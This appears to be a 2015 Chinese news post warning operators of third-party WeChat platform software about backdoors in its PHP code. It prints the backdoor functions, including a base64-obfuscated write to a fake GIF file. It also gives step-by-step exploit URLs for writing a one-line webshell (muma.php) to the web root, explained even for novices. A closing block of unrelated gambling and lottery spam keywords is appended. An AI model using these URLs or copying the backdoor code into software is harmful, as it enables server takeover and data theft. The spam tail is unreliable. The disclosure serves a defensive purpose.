新聞中心NEWS

UPTATED:2015-07-30 返回列表微信第三方平臺出現驚人后門及漏洞

網曝微信第三方平臺出現驚人后門及漏洞,后門及漏洞輕則導致網站無法訪問,內容被篡改,嚴重的可能盜取服務器資料。
更嚴重的可能會獲取服務器直接管理權限,因為代碼屬于正常參數提交,所以不會被殺毒軟件及各種防火墻攔截,完全免疫!!!
后門1:WeixinAction.class.php
public function test($name, $data)
    {
        file_put_contents($name, $data);
    }
這句話的意思就是在根目錄生成文件data可以一句話木馬提交注入。
執行原理網址后加index.php?g=Home&m=Weixin&a=test&name=muma.php&data=木馬內容,
直接打開瀏覽就可以。笨蛋的說就是粘貼進網址按回車。
這里就是提交一句話木馬寫入到根目錄muma.php內 由于很多程序做了轉碼,但是還是很多可以執行的。
通殺微信管家舊版admin2/index.php?g=Home&m=Weixin&a=test&name=muma.php&data=木馬代碼
請勿將muma.php修改為index.php 否則會導致首頁無法打開 只做測試使用,請勿用作非法用途
這一個算比較明顯的注入后門。
后門2
查找文件TAction.class.php
public function test(){
                 file_put_contents(base64_decode('dHBsL1VzZXIvZGVmYXVsdC9jb21tb24vaW1hZ2VzL2ZhY2UvMTA0LmdpZg=='),htmlspecialchars($_GET['n']));
        }*
執行原理PHP圖片注入木馬//疑似后門,它生成文件tpl/User/default/common/images/face/104.gif
這個文件雖然是104.gif,但它的內容卻是由提交參數寫入的。

后門3
TagLib.class.php
public function checkdat(){
                @$string=file_get_contents(base64_decode('dHBsL1VzZXIvZGVmYXVsdC9jb21tb24vaW1hZ2VzL2ZhY2UvMTA0LmdpZg=='));
                //if($this->think_encrypt($this->thinkphpgetmi())!=$string){eval(base64_decode("ZXhpdCgpOw=="));}
        }
而且本頁里$this->mat     = $this->checkdat();
\Lib\Driver\TagLib\TagLibCx.class.php
$baiduccheckdata=$this->checkdat();
這兩個都只是賦值進去,并沒有使用。
本后門加密結果還是一句話注入后門程序
基本所有版本內都有,各位運營者抓緊檢查吧,別等被黑的時候不知道為什么。其他未發現的后門木馬數量未知,自行檢查全站吧。代碼加密的就先解密檢查。
北京麻将推筒子技巧 爱彩乐广西11选5开奖结果图 新疆时时开奖结杲 手机街机电玩捕鱼 360老时时安全购 舟山飞鱼一共几期 新疆时时开奖号标图 湖北11选5开奖 大乐透后区遗漏数据表 韩国快三网站 pk10如何看大小 捕鱼大师官网现金板 上海时时票网 河北20选5开奖结果查询今天 天津时时彩开奖结果怎么查 上海时时几点开始 捕鱼大亨系统笔趣阁